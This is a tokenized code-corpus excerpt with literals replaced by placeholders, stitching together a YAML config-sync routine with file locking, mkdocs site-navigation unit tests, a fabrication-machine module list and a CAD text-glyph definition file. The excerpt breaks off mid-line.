'<STR_LIT>' ] [ '<STR_LIT:id>' ] = '<STR_LIT>' . format ( cid ) <EOL> self = cls ( ** conf_cls ) <EOL> self . conf_save = conf [ '<STR_LIT>' ] <EOL> return self <EOL> def sync ( self ) : <EOL> if not self . conf_save : return <EOL> from onedrive import portalocker <EOL> import yaml <EOL> retry = False <EOL> with open ( self . conf_save , '<STR_LIT>' ) as src : <EOL> portalocker . lock ( src , portalocker . LOCK_SH ) <EOL> conf_raw = src . read ( ) <EOL> conf = yaml . safe_load ( io . BytesIO ( conf_raw ) ) if conf_raw else dict ( ) <EOL> portalocker . unlock ( src ) <EOL> conf_updated = False <EOL> for ns , keys in self . conf_update_keys . viewitems ( ) : <EOL> for k in keys : <EOL> v = getattr ( self , '<STR_LIT>' . format ( ns , k ) , None ) <EOL> if isinstance ( v , unicode ) : v = v . encode ( '<STR_LIT:utf-8>' ) <EOL> if v != conf . get ( ns , dict ( ) ) . get ( k ) : <EOL> conf . setdefault ( ns , dict ( ) ) [ k ] = v <EOL> conf_updated = True <EOL> if conf_updated : <EOL> log . debug ( '<STR_LIT>' , src . name ) <EOL> conf_new = yaml . safe_dump ( conf , default_flow_style = False ) <EOL> if os . name == '<STR_LIT>' : <EOL> portalocker . lock ( src , portalocker . LOCK_EX ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> if src . read ( ) != conf_raw : retry = True <EOL> else : <EOL> src . seek ( <NUM_LIT:0> ) <EOL> src . truncate ( ) <EOL> src . write ( conf_new ) <EOL> src . flush ( ) <EOL> portalocker . unlock ( src ) <EOL> else : <EOL> with tempfile . NamedTemporaryFile ( <EOL> prefix = '<STR_LIT>' . format ( basename ( self . conf_save ) ) , <EOL> dir = dirname ( self . conf_save ) , delete = False ) as tmp : <EOL> try : <EOL> portalocker . lock ( src , portalocker . LOCK_EX ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> if src . read ( ) != conf_raw : retry = True <EOL> else : <EOL> portalocker . lock ( tmp , portalocker . LOCK_EX ) <EOL> tmp . write ( conf_new ) <EOL> os . fchmod ( tmp . fileno ( ) , stat . S_IMODE ( os . fstat ( src . fileno ( ) ) . st_mode ) ) <EOL> os . rename ( tmp . name , src . name ) <EOL> src . seek ( <NUM_LIT:0> ) <EOL> src . truncate ( ) <EOL> src . write ( conf_new ) <EOL> finally : <EOL> try : os . unlink ( tmp . name ) <EOL> except OSError : pass <EOL> if retry : <EOL> log . debug ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , self . conf_save ) <EOL> return self . sync ( ) </s>
<s> from __future__ import unicode_literals <EOL> import mock <EOL> import os <EOL> import unittest <EOL> from mkdocs import nav , legacy <EOL> from mkdocs . exceptions import ConfigurationError <EOL> from mkdocs . tests . base import dedent <EOL> class SiteNavigationTests ( unittest . TestCase ) : <EOL> def test_simple_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:2> ) <EOL> def test_empty_toc_item ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:2> ) <EOL> def test_indented_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:6> ) <EOL> def test_nested_ungrouped ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> def test_nested_ungrouped_no_titles ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> def test_nested_ungrouped_no_titles_windows ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:3> ) <EOL> def test_walk_simple_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_empty_toc ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_indented_toc ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_base_url ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages , use_directory_urls = False ) <EOL> base_url = site_navigation . url_context . make_relative ( '<STR_LIT:/>' ) <EOL> self . assertEqual ( base_url , '<STR_LIT:.>' ) <EOL> def test_relative_md_links_have_slash ( self ) : <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages , use_directory_urls = False ) <EOL> site_navigation . url_context . base_path = "<STR_LIT>" <EOL> url = site_navigation . url_context . make_relative ( '<STR_LIT>' ) <EOL> self . assertEqual ( url , '<STR_LIT>' ) <EOL> def test_generate_site_navigation ( self ) : <EOL> """<STR_LIT>""" <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> url_context = nav . URLContext ( ) <EOL> nav_items , pages = nav . _generate_site_navigation ( pages , url_context ) <EOL> self . assertEqual ( [ n . title for n in nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ p . title for p in pages ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> def test_generate_site_navigation_windows ( self ) : <EOL> """<STR_LIT>""" <EOL> pages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> url_context = nav . URLContext ( ) <EOL> nav_items , pages = nav . _generate_site_navigation ( pages , url_context ) <EOL> self . assertEqual ( [ n . title for n in nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ p . title for p in pages ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_invalid_pages_config ( self ) : <EOL> bad_pages = [ <EOL> set ( ) , <EOL> { "<STR_LIT:a>" : "<STR_LIT>" , "<STR_LIT:b>" : "<STR_LIT>" } <EOL> ] <EOL> for bad_page in bad_pages : <EOL> def _test ( ) : <EOL> return nav . _generate_site_navigation ( ( bad_page , ) , None ) <EOL> self . assertRaises ( ConfigurationError , _test ) <EOL> def test_pages_config ( self ) : <EOL> bad_page = { } <EOL> def _test ( ) : <EOL> return nav . _generate_site_navigation ( ( bad_page , ) , None ) <EOL> self . assertRaises ( ConfigurationError , _test ) <EOL> def test_ancestors ( self ) : <EOL> pages = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ] } <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> ancestors = ( <EOL> [ ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:1> ] , <EOL> site_navigation . pages [ <NUM_LIT:4> ] . ancestors [ - <NUM_LIT:1> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:2> ] ] , <EOL> [ site_navigation . nav_items [ <NUM_LIT:2> ] ] , <EOL> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , len ( ancestors ) ) <EOL> for i , ( page , expected_ancestor ) in enumerate ( <EOL> zip ( site_navigation . pages , ancestors ) ) : <EOL> self . assertEqual ( page . ancestors , expected_ancestor , <EOL> "<STR_LIT>" . format ( i ) ) <EOL> def test_nesting ( self ) : <EOL> pages_config = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] } <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages_config ) <EOL> self . assertEqual ( [ n . title for n in site_navigation . nav_items ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:12> ) <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> self . maxDiff = None <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> class TestLegacyPagesConfig ( unittest . TestCase ) : <EOL> def test_walk_simple_toc ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_empty_toc ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_walk_indented_toc ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = [ <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) , <EOL> dedent ( """<STR_LIT>""" ) <EOL> ] <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> for index , page in enumerate ( site_navigation . walk_pages ( ) ) : <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected [ index ] ) <EOL> def test_indented_toc_missing_child_title ( self ) : <EOL> pages = legacy . pages_compat_shim ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) <EOL> expected = dedent ( """<STR_LIT>""" ) <EOL> site_navigation = nav . SiteNavigation ( pages ) <EOL> self . assertEqual ( str ( site_navigation ) . strip ( ) , expected ) <EOL> self . assertEqual ( len ( site_navigation . nav_items ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( site_navigation . pages ) , <NUM_LIT:6> ) </s>
<s> """<STR_LIT>""" <EOL> import modela , epilog , universal , null , shopbot , gcode , shopbot5 <EOL> MACHINES = [ null , modela , epilog , universal , shopbot , gcode , shopbot5 ] </s>
<s> from koko . lib . shapes2d import * <EOL> def text ( text , x , y , height = <NUM_LIT:1> , align = '<STR_LIT>' ) : <EOL> dx , dy = <NUM_LIT:0> , - <NUM_LIT:1> <EOL> text_shape = None <EOL> for line in text . split ( '<STR_LIT:\n>' ) : <EOL> line_shape = None <EOL> for c in line : <EOL> if not c in _glyphs . keys ( ) : <EOL> print '<STR_LIT>' % c <EOL> else : <EOL> chr_math = move ( _glyphs [ c ] , dx , dy ) <EOL> if line_shape is None : line_shape = chr_math <EOL> else : line_shape += chr_math <EOL> dx += _glyphs [ c ] . width + <NUM_LIT:0.1> <EOL> dx -= <NUM_LIT:0.1> <EOL> if line_shape is not None : <EOL> if align [ <NUM_LIT:0> ] == '<STR_LIT:L>' : <EOL> pass <EOL> elif align [ <NUM_LIT:0> ] == '<STR_LIT:C>' : <EOL> line_shape = move ( line_shape , - dx / <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> elif align [ <NUM_LIT:0> ] == '<STR_LIT:R>' : <EOL> line_shape = move ( line_shape , - dx , <NUM_LIT:0> ) <EOL> text_shape += line_shape <EOL> dy -= <NUM_LIT> <EOL> dx = <NUM_LIT:0> <EOL> dy += <NUM_LIT> <EOL> if text_shape is None : return None <EOL> if align [ <NUM_LIT:1> ] == '<STR_LIT:T>' : <EOL> pass <EOL> elif align [ <NUM_LIT:1> ] == '<STR_LIT:B>' : <EOL> text_shape = move ( text_shape , <NUM_LIT:0> , - dy , ) <EOL> elif align [ <NUM_LIT:1> ] == '<STR_LIT:C>' : <EOL> text_shape = move ( text_shape , <NUM_LIT:0> , - dy / <NUM_LIT:2> ) <EOL> if height != <NUM_LIT:1> : <EOL> text_shape = scale_xy ( text_shape , <NUM_LIT:0> , <NUM_LIT:0> , height ) <EOL> dx *= height <EOL> dy *= height <EOL> return move ( text_shape , x , y ) <EOL> _glyphs = { } <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:A>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = shear_x_y ( shape , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape = move ( shape , - <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:a>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:B>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) + rectangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:b>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:0.5> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:C>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:c>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) - circle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:D>' ] = shape <EOL> shape = reflect_x ( _glyphs [ '<STR_LIT:b>' ] , _glyphs [ '<STR_LIT:b>' ] . width / <NUM_LIT:2> ) <EOL> shape . width = _glyphs [ '<STR_LIT:b>' ] . width <EOL> _glyphs [ '<STR_LIT:d>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:E>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:e>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:F>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:f>' ] = shape <EOL> shape = circle ( <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:0.1> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:g>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:H>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , 